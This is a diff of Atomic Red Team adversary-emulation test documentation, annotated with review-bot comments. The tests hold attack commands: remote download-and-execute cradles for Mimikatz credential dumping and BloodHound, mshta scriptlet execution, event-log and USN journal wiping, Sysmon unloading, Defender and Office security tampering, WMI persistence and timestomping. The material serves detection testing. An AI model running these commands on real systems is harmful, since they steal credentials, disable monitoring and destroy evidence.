## Atomic Test #4 - Elevated group enumeration using net group
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This
test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
**Supported Platforms:** Windows

View File

@ -38,7 +38,7 @@ Logs may also be cleared through other mechanisms, such as [PowerShell](https://
<br/>
## Atomic Test #1 - Clear Logs
Upon execution this test will clear Windows Event Logs
Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty.
**Supported Platforms:** Windows
@ -67,7 +67,8 @@ wevtutil cl #{log_name}
<br/>
## Atomic Test #2 - FSUtil
Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume.
Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon exectuion, no output
will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn
**Supported Platforms:** Windows
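Review bot: "exectuion" should be "execution" in the added sentence.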
@ -82,6 +83,10 @@ Manages the update sequence number (USN) change journal, which provides a persis
fsutil usn deletejournal /D C:
```
#### Cleanup Commands:
```cmd
fsutil usn createjournal m=1000 a=100 c:
```
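Review bot: The new cleanup recreates the journal with `m=1000 a=100`, a 1000-byte maximum size, which is far smaller than the journal the test deleted, so the volume is not returned to its prior state. Consider capturing `fsutil usn queryjournal c:` output before deletion and restoring those sizes, or at least using Windows' default sizes in the createjournal call.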
@ -174,7 +179,9 @@ echo 0> #{log_path}
<br/>
## Atomic Test #6 - Delete System Logs Using PowerShell
Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments
Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments.
Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
When this service get's stopped, it is automatically restarted and the Security.evtx folder re-created.
**Supported Platforms:** Windows
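Review bot: "get's" should be "gets", and Security.evtx is a file rather than a folder, so the last added line should read "the Security.evtx file is re-created". For consistency, "open the Security.evtx logs ... verify that it is now empty" should also refer to "the Security.evtx log".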
@ -204,7 +211,8 @@ Start-Service -Name EventLog
<br/>
## Atomic Test #7 - Delete System Logs Using Clear-EventLogId
Clear event logs using built-in PowerShell commands
Clear event logs using built-in PowerShell commands.
Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
**Supported Platforms:** Windows
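Review bot: The heading in context names "Clear-EventLogId", which is not a PowerShell cmdlet; the built-in one is Clear-EventLog. Worth fixing while this description is being edited, since the anchor in the table of contents would change too.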

View File

@ -12,7 +12,8 @@ Adversaries likely use this technique as a means of masking actions they perform
<br/>
## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary
GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded
GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.
Upon execution, calc.exe will be opened.
**Supported Platforms:** Windows
@ -23,13 +24,14 @@ GUP is an open source signed binary used by Notepad++ for software updates, and
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_name | Name of the created process | string | calculator.exe|
| gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | path | PathToAtomicsFolder&#92;T1073&#92;bin&#92;GUP.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
$PathToAtomicsFolder\T1073\bin\GUP.exe
#{gup_executable}
```
#### Cleanup Commands:
@ -39,6 +41,19 @@ taskkill /F /IM #{process_name}
#### Dependencies: Run with `powershell`!
##### Description: Gup.exe binary must exist on disk at specified location (#{gup_executable})
##### Check Prereq Commands:
```powershell
if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1073/bin/GUP.exe" -OutFile "#{gup_executable}"
```
<br/>
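Review bot: The Get Prereq `Invoke-WebRequest` URL uses the `/blob/master/` GitHub page path, which returns an HTML page rather than the binary, so the saved GUP.exe will not execute and the test fails after the prereq reports success. Use the raw download form as the other prereq downloads in this commit do (the `https://github.com/redcanaryco/atomic-red-team/raw/master/...` style).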

View File

@ -16,21 +16,31 @@ Interactive command shells may be used, and common functionality within [cmd](ht
<br/>
## Atomic Test #1 - Stage data from Discovery.bat
Utilize powershell to download discovery.bat and save to a local file
Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
verify that the file is saved in the temp directory.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP&#92;discovery.bat|
#### Attack Commands: Run with `powershell`!
```powershell
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat') > pi.log
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat" -OutFile #{output_file}
```
#### Cleanup Commands:
```powershell
Remove-Item -Force #{output_file} -ErrorAction Ignore
```
@ -64,24 +74,31 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
<br/>
## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration.
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
was placed in the temp directory.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Location of file or folder to zip | Path | PathToAtomicsFolder&#92;T1074&#92;bin&#92;Folder_to_zip|
| output_file | Location to save zipped file or folder | Path | $env:TEMP&#92;Folder_to_zip.zip|
#### Attack Commands: Run with `powershell`!
```powershell
Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force
```
#### Cleanup Commands:
```powershell
Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore
Remove-Item -Path #{output_file} -ErrorAction Ignore
```

View File

@ -24,7 +24,8 @@ In Mac and Linux, this kind of discovery is accomplished with the <code>ls</code
<br/>
## Atomic Test #1 - File and Directory Discovery (cmd.exe)
Find or discover files on the file system
Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of
all of the data discovery commands.
**Supported Platforms:** Windows
@ -39,7 +40,6 @@ Find or discover files on the file system
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
dir /s "c:\Program Files\" >> %temp%\download
dir /s d:\ >> %temp%\download
dir "%systemdrive%\Users\*.*" >> %temp%\download
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
dir "%userprofile%\Desktop\*.*" >> %temp%\download
@ -55,7 +55,7 @@ tree /F >> %temp%\download
<br/>
## Atomic Test #2 - File and Directory Discovery (PowerShell)
Find or discover files on the file system
Find or discover files on the file system. Upon execution, file and folder information will be displayed.
**Supported Platforms:** Windows

View File

@ -4,15 +4,14 @@
## Atomic Tests
- [Atomic Test #1 - Persistence](#atomic-test-1---persistence)
- [Atomic Test #1 - Persistence via WMI Event Subscription](#atomic-test-1---persistence-via-wmi-event-subscription)
<br/>
## Atomic Test #1 - Persistence
Run from an administrator powershell window
After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
## Atomic Test #1 - Persistence via WMI Event Subscription
Run from an administrator powershell window. After running, reboot the victim machine.
After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
@ -52,7 +51,6 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject

View File

@ -24,7 +24,7 @@ Rundll32 can also been used to execute scripts such as JavaScript. This can be d
<br/>
## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject
Test execution of a remote script using rundll32.exe
Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
**Supported Platforms:** Windows
@ -129,6 +129,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - Rundll32 ieadvpack.dll Execution
Test execution of a command using rundll32.exe with ieadvpack.dll.
Upon execution calc.exe will be launched
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml
@ -172,7 +173,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #5 - Rundll32 syssetup.dll Execution
Test execution of a command using rundll32.exe with syssetup.dll.
Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml
@ -216,7 +217,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #6 - Rundll32 setupapi.dll Execution
Test execution of a command using rundll32.exe with setupapi.dll.
Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml
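Review bot: "a windows saying" should be "a window saying", and both the #5 and #6 sentences are missing a closing period.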

View File

@ -22,29 +22,27 @@ PowerShell commands/scripts can also be executed without directly invoking the p
- [Atomic Test #5 - Invoke-AppPathBypass](#atomic-test-5---invoke-apppathbypass)
- [Atomic Test #6 - PowerShell Add User](#atomic-test-6---powershell-add-user)
- [Atomic Test #6 - Powershell MsXml COM object - no prompt](#atomic-test-6---powershell-msxml-com-object---no-prompt)
- [Atomic Test #7 - Powershell MsXml COM object - no prompt](#atomic-test-7---powershell-msxml-com-object---no-prompt)
- [Atomic Test #7 - Powershell MsXml COM object - with prompt](#atomic-test-7---powershell-msxml-com-object---with-prompt)
- [Atomic Test #8 - Powershell MsXml COM object - with prompt](#atomic-test-8---powershell-msxml-com-object---with-prompt)
- [Atomic Test #8 - Powershell XML requests](#atomic-test-8---powershell-xml-requests)
- [Atomic Test #9 - Powershell XML requests](#atomic-test-9---powershell-xml-requests)
- [Atomic Test #9 - Powershell invoke mshta.exe download](#atomic-test-9---powershell-invoke-mshtaexe-download)
- [Atomic Test #10 - Powershell invoke mshta.exe download](#atomic-test-10---powershell-invoke-mshtaexe-download)
- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle)
- [Atomic Test #11 - Powershell Invoke-DownloadCradle](#atomic-test-11---powershell-invoke-downloadcradle)
- [Atomic Test #11 - PowerShell Fileless Script Execution](#atomic-test-11---powershell-fileless-script-execution)
- [Atomic Test #12 - PowerShell Fileless Script Execution](#atomic-test-12---powershell-fileless-script-execution)
- [Atomic Test #12 - PowerShell Downgrade Attack](#atomic-test-12---powershell-downgrade-attack)
- [Atomic Test #13 - PowerShell Downgrade Attack](#atomic-test-13---powershell-downgrade-attack)
- [Atomic Test #14 - NTFS Alternate Data Stream Access](#atomic-test-14---ntfs-alternate-data-stream-access)
- [Atomic Test #13 - NTFS Alternate Data Stream Access](#atomic-test-13---ntfs-alternate-data-stream-access)
<br/>
## Atomic Test #1 - Mimikatz
Download Mimikatz and dump credentials
Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.
**Supported Platforms:** Windows
@ -75,7 +73,7 @@ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invo
## Atomic Test #2 - BloodHound
Upon execution BloodHound will be downloaded and executed. It will set up collection methods, run,
and then compress and store the data to the temp directory on the machine
and then compress and store the data to the temp directory on the machine
**Supported Platforms:** Windows
@ -88,13 +86,17 @@ and then compress and store the data to the temp directory on the machine
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `powershell`!
```cmd
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
```powershell
IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound
```
#### Cleanup Commands:
```powershell
Remove-Item $env:temp\*BloodHound.zip -Force
```
@ -131,7 +133,7 @@ Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set
<br/>
## Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys
Run mimikatz via PsSendKeys
Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
**Supported Platforms:** Windows
@ -180,39 +182,7 @@ Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu
<br/>
<br/>
## Atomic Test #6 - PowerShell Add User
Using PS 5.1, add a user via CLI
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username to add | string | atomic_user|
| full_name | Full name of user | string | Atomic Red Team|
| password | password to use | string | ATOM1CR3DT3@M|
| description | Brief description of account | string | Atomic Things|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
```
<br/>
<br/>
## Atomic Test #7 - Powershell MsXml COM object - no prompt
## Atomic Test #6 - Powershell MsXml COM object - no prompt
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
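Review bot: The "PowerShell Add User" test is removed without a stated reason; if the motive is that `-Password #{password}` passed a plain string where New-LocalUser requires a SecureString, say so in the commit message so the removal is not read as dropping coverage of local account creation by accident.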
@ -243,10 +213,10 @@ powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Ob
<br/>
<br/>
## Atomic Test #8 - Powershell MsXml COM object - with prompt
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
## Atomic Test #7 - Powershell MsXml COM object - with prompt
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
Provided by https://github.com/mgreen27/mgreen27.github.i
**Supported Platforms:** Windows
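Review bot: The "Provided by" URL on the last added line is truncated to https://github.com/mgreen27/mgreen27.github.i; the removed line above had the full .io address. The rewritten sentence "Not proxy aware, removing cache although does not appear to write to those locations" also still reads awkwardly; suggest "Not proxy aware; the cache is cleared although the test does not appear to write to those locations".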
@ -274,9 +244,10 @@ powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.S
<br/>
<br/>
## Atomic Test #9 - Powershell XML requests
## Atomic Test #8 - Powershell XML requests
Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed.
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell xml download request
**Supported Platforms:** Windows
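Review bot: "dispalyed" should be "displayed" in the added sentence.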
@ -293,7 +264,7 @@ Powershell xml download request
```cmd
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
```
@ -304,9 +275,10 @@ Powershell xml download request
<br/>
<br/>
## Atomic Test #10 - Powershell invoke mshta.exe download
## Atomic Test #9 - Powershell invoke mshta.exe download
Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!".
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell invoke mshta to download payload
**Supported Platforms:** Windows
@ -319,11 +291,11 @@ Powershell invoke mshta to download payload
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `command_prompt`!
```powershell
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
```cmd
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
```
@ -334,7 +306,7 @@ Powershell invoke mshta to download payload
<br/>
<br/>
## Atomic Test #11 - Powershell Invoke-DownloadCradle
## Atomic Test #10 - Powershell Invoke-DownloadCradle
Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
@ -356,8 +328,9 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
<br/>
<br/>
## Atomic Test #12 - PowerShell Fileless Script Execution
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections.
## Atomic Test #11 - PowerShell Fileless Script Execution
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that
art-marker.txt is in the folder.
**Supported Platforms:** Windows
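Review bot: "Upon exection" should be "Upon execution", and the verification step should name the full marker path (`C:\Windows\Temp\art-marker.txt`) rather than asking the reader to open the folder, which a standard user cannot list. The "Elevation Required" flag added to this test's attack command just below also needs a reason: the cleanup touches only `HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam`, which a standard user can write, so either state which step needs admin or drop the flag.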
@ -365,7 +338,7 @@ Execution of a PowerShell payload from the Windows Registry similar to that seen
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
@ -387,7 +360,7 @@ cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f
<br/>
<br/>
## Atomic Test #13 - PowerShell Downgrade Attack
## Atomic Test #12 - PowerShell Downgrade Attack
Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
**Supported Platforms:** Windows
@ -423,8 +396,8 @@ Write-Host Automated installer not implemented yet, please install PowerShell v
<br/>
<br/>
## Atomic Test #14 - NTFS Alternate Data Stream Access
Creates a file with an alternate data stream and simulates executing that hidden code/file
## Atomic Test #13 - NTFS Alternate Data Stream Access
Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
**Supported Platforms:** Windows

View File

@ -165,7 +165,7 @@ username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
## Atomic Test #5 - Show if a user account has ever logged in remotely
Show if a user account has ever logged in remotely
**Supported Platforms:** Linux, macOS
**Supported Platforms:** Linux
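Review bot: dropping macOS from Supported Platforms without touching the description leaves macOS users guessing why; add a clause naming the Linux-only tool the command depends on, or keep macOS and supply an alternative command, so the platform list and the description agree.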

View File

@ -239,7 +239,8 @@ sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfig
<br/>
## Atomic Test #8 - Unload Sysmon Filter Driver
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution,
run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
**Supported Platforms:** Windows
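Review bot: the new verification sentence is garbled ("To verify successful execution, o verify successful execution,") and "prereq_command's" wants no apostrophe. It should also say which prerequisite check is meant, since three are now defined for this test: it is the "sysmon filter must be loaded" check (`fltmc.exe filters | findstr #{sysmon_driver}`) that is expected to fail after the unload, while the "downloaded" and "installed" checks still pass.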
@ -261,22 +262,45 @@ fltmc.exe unload #{sysmon_driver}
#### Cleanup Commands:
```cmd
sc stop sysmon
fltmc.exe load #{sysmon_driver}
sc start sysmon
sysmon -u -i > nul 2>&1
sysmon -i -accepteula -i > nul 2>&1
%temp%\Sysmon\sysmon.exe -u > nul 2>&1
%temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1
```
#### Dependencies: Run with `command_prompt`!
##### Description: Sysmon filter must be loaded
#### Dependencies: Run with `powershell`!
##### Description: Sysmon must be downloaded
##### Check Prereq Commands:
```cmd
fltmc.exe filters | findstr #{sysmon_driver}
```powershell
if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```cmd
echo Automated installer not implemented yet, please install Sysmon manually
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
Remove-Item $env:TEMP\Sysmon.zip -Force
```
##### Description: sysmon must be Installed
##### Check Prereq Commands:
```powershell
if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
{ Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i}
```
##### Description: sysmon filter must be loaded
##### Check Prereq Commands:
```powershell
if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
sysmon -u
sysmon -accepteula -i
```
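Review bot: the cleanup and the last Get Prereq block restore the filter by uninstalling and reinstalling Sysmon (`sysmon -u` / `sysmon -accepteula -i`), which replaces whatever configuration the host was running with Sysmon's default config, so an evaluation box loses its event filtering the first time this test runs; `fltmc.exe load #{sysmon_driver}`, which the previous cleanup used, reloads the driver without touching the config. Also in the cleanup block, `sysmon -u -i > nul 2>&1` passes both the uninstall and install switches and `sysmon -i -accepteula -i` repeats `-i`; and the "sysmon must be Installed" Get Prereq hardcodes `C:\Windows\Sysmon.exe` after `where.exe` has already located the binary, so it should run the path it found (or plain `Sysmon.exe` via PATH) instead.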
@ -533,7 +557,8 @@ Credit to Matt Graeber (@mattifestation) for the research.
<br/>
## Atomic Test #16 - Tamper with Windows Defender ATP PowerShell
Attempting to disable scheduled scanning and other parts of windows defender atp
Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
**Supported Platforms:** Windows
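Review bot: the description keeps calling this "windows defender atp", but `Set-MpPreference` (visible in the cleanup context, `-DisableBlockAtFirstSeen 0`) configures Windows Defender Antivirus, not the Defender ATP EDR sensor; say "Windows Defender Antivirus". The verification sentence also needs a caveat: on Windows 10 1903 and later with Tamper Protection enabled these preference changes are ignored, so "Virus and Threat Protection will show as disabled" only holds with Tamper Protection off, and the attempt itself (the PowerShell command line) is then what to detect.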
@ -567,7 +592,8 @@ Set-MpPreference -DisableBlockAtFirstSeen 0
<br/>
## Atomic Test #17 - Tamper with Windows Defender Command Prompt
Attempting to disable scheduled scanning and other parts of windows defender atp
Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on.
**Supported Platforms:** Windows
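Review bot: "These commands must be run as System, so they still fail as administrator" reads as a contradiction; say it directly: the commands require SYSTEM, so they fail when run as an administrator, and the value of the test is the command-line telemetry of the attempt. The cleanup line this test ends with, `sc config WinDefend start=enabled` (shown as the context of the next hunk), cannot work: `enabled` is not a valid sc start type (boot, system, auto, demand, disabled, delayed-auto are) and sc.exe requires a space after `start=`; restoring the service wants `sc config WinDefend start= auto`, otherwise cleanup leaves WinDefend in whatever state the test put it in. "windows defender atp" should be "Windows Defender Antivirus" here as well, since WinDefend is the antivirus service.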
@ -598,7 +624,8 @@ sc config WinDefend start=enabled
<br/>
## Atomic Test #18 - Tamper with Windows Defender Registry
Disable Windows Defender from starting after a reboot
Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
grayed out and have no info.
**Supported Platforms:** Windows
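Review bot: "Upen execution" should be "Upon execution". The sentence also only hints at the reboot requirement ("if the computer is rebooted"); say plainly that the policy value is read at service start, so the effect is only visible after a restart, and that the verification is therefore a post-reboot check rather than an immediate one.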
@ -626,7 +653,10 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa
<br/>
## Atomic Test #19 - Disable Microft Office Security Features
Gorgon group may disable Office security features so that their code can run
Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
show any warning before editing the document
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
**Supported Platforms:** Windows
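Review bot: the unchanged title still misspells "Microsoft" ("Microft"); fix it while this description is being edited. The new verification sentence should also name the control being disabled: the Protected View keys that the cleanup removes (`...\Excel\Security\ProtectedView`, per the next hunk's context) are why "an external document will not show any warning before editing", and naming them tells a reader what to look for in registry telemetry.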
@ -662,8 +692,10 @@ Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Protected
<br/>
## Atomic Test #20 - Remove Windows Defender Definition Files
Removing definition files would cause ATP to not fire for AntiMalware
Check MpCmdRun.exe man page for info on all arguments
Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.
On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the
command will say completed.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
**Supported Platforms:** Windows
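Review bot: typos in the added text: "viersions" -> "versions", "inusfficient privelages" -> "insufficient privileges", and "man page" is odd for a Windows binary (point at the `MpCmdRun.exe -?` usage output instead). More importantly, the description should state what the expected outcome on 1909+ is, as with the command-prompt test: the removal is known to fail there, so the test's value is the MpCmdRun.exe command line and the resulting Defender event, not the definition removal. "ATP" again means Defender Antivirus here.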

View File

@ -148,9 +148,8 @@ touch -acmr #{reference_file_path} #{target_file_path}
<br/>
## Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell
Modifies the file creation timestamp of a specified file.
This technique was seen in use by the Stitch RAT.
Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.
**Supported Platforms:** Windows
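Review bot: "observe that the Created time is the year 1970" is the right quick check, but the description should note that setting `.CreationTime` only rewrites the $STANDARD_INFORMATION timestamps in the file's MFT record; the $FILE_NAME timestamps are untouched, which is exactly what timestomp detection (comparing the two attributes) keys on, and Explorer shows only the $SI value. Also say that the `1970-01-01 00:00:00` string is parsed as local time, so the stored UTC value is offset by the host's time zone.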
@ -160,7 +159,7 @@ This technique was seen in use by the Stitch RAT.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path of file to change creation timestamp | Path | $env:APPDATA&#92;atomic.txt|
| file_path | Path of file to change creation timestamp | Path | $env:TEMP&#92;T1099_timestomp.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
@ -168,27 +167,37 @@ This technique was seen in use by the Stitch RAT.
```powershell
New-Item #{file_path} -Force
Set-Content #{file_path} -Value "atomic test" -Force
Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" }
```
#### Cleanup Commands:
```powershell
Remove-Item #{file_path} -Force
Remove-Item #{file_path} -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: A file must exist at the path (#{file_path}) to change the creation time on
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Path #{file_path} -Force | Out-Null
Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
```
<br/>
<br/>
## Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell
Modifies the file last modified timestamp of a specified file.
This technique was seen in use by the Stitch RAT.
Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.
**Supported Platforms:** Windows
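Review bot: `Test-Path #{file_path}`, `Remove-Item #{file_path} -Force -ErrorAction Ignore` and `Get-ChildItem #{file_path}` all use the input unquoted, so a custom `file_path` containing a space breaks every one of them; quote the substitution (`"#{file_path}"`) in the attack, cleanup and prereq commands. Moving the `New-Item`/`Set-Content` lines out of the attack command and into the prereq is the right split, since the attack command now records only the timestamp change.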
@ -198,7 +207,7 @@ This technique was seen in use by the Stitch RAT.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path of file to change last modified timestamp | Path | $env:APPDATA&#92;atomic.txt|
